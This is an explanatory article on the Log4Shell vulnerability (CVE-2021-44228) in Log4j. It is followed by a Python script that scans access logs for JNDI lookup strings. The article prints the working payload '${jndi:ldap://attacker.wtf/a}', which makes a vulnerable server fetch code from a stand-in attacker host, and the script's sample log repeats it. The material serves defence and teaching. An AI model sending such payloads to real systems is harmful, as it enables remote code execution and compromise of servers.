This article briefly describes a critical zero-day vulnerability called Log4Shell in the widely used Java logging library Log4j, which is used by millions of Java applications reachable from the Internet. The vulnerability can be exploited even by unskilled attackers and results in remote code execution (RCE) whenever Log4j is used to write user-controlled data into a log file.
The vulnerability is one of the worst of 2021 and was rated as critical: it received a CVSS score of 10. CVSS is a metric for rating the severity of vulnerabilities, and 10 is the maximum value that can be assigned. The vulnerability was assigned the CVE number CVE-2021-44228.
Last update: 20th December, 2021
How Can an Attacker Exploit the Vulnerability?
Let’s assume you have a web application written in Java that logs the user agent of each request. You log this data to create browser statistics for your web site so you can better optimize it.
If you use a vulnerable Log4j version to log the user agents, an attacker could set the following string as the user agent of a request:
${jndi:ldap://attacker.wtf/a}
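The payload above only works because the logging library interprets lookup syntax inside data the attacker controls. From the defender's side, the same property makes it easy to spot in access logs: a browser never sends `${...}` in its user agent. The following Python script is an added example, not code from the article, that parses constructed access-log lines in the common combined format and flags any request, referer or user agent containing the `${jndi:` lookup the article describes, or more generally any `${...}` lookup syntax. The log lines, field names and the `Finding` type are all assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample access-log lines (made up for this example, not data from the article).
# Line 2 carries the user agent from the article; line 4 carries lookup syntax in the URL.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"
203.0.113.9 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.wtf/a}"
198.51.100.2 - - [10/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "Price$Tracker/1.0"
198.51.100.7 - - [10/Dec/2021:10:00:04 +0000] "GET /search?q=${foo:bar} HTTP/1.1" 200 88 "-" "curl/7.79.1"
"""

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# ${jndi:...} is the lookup the article describes; match it case-insensitively
# and tolerate whitespace around the prefix.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any ${...} lookup syntax has no legitimate place in a user agent, referer or URL,
# so it is flagged at a lower severity even when the prefix is not "jndi".
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


@dataclass
class Finding:
    line_no: int
    field: str
    kind: str
    value: str


def classify(value: str) -> Optional[str]:
    """Return 'jndi-lookup', 'lookup-syntax' or None for one untrusted field."""
    if JNDI_LOOKUP.search(value):
        return "jndi-lookup"
    if ANY_LOOKUP.search(value):
        return "lookup-syntax"
    return None


def scan_log(text: str) -> List[Finding]:
    """Scan every attacker-controlled field of each access-log line."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count and review these
        for field in ("request", "referer", "user_agent"):
            kind = classify(m.group(field))
            if kind:
                findings.append(Finding(line_no, field, kind, m.group(field)))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind} in {f.field}: {f.value}")
```

Running the script flags line 2 (the article's `${jndi:` user agent) and line 4 (generic lookup syntax in the query string), while the plain `$` in `Price$Tracker/1.0` on line 3 is correctly ignored. Detection like this only tells you that someone tried; whether the attempt succeeded depends on the Log4j version in use, so a hit should trigger a check of the affected application rather than be treated as proof of compromise.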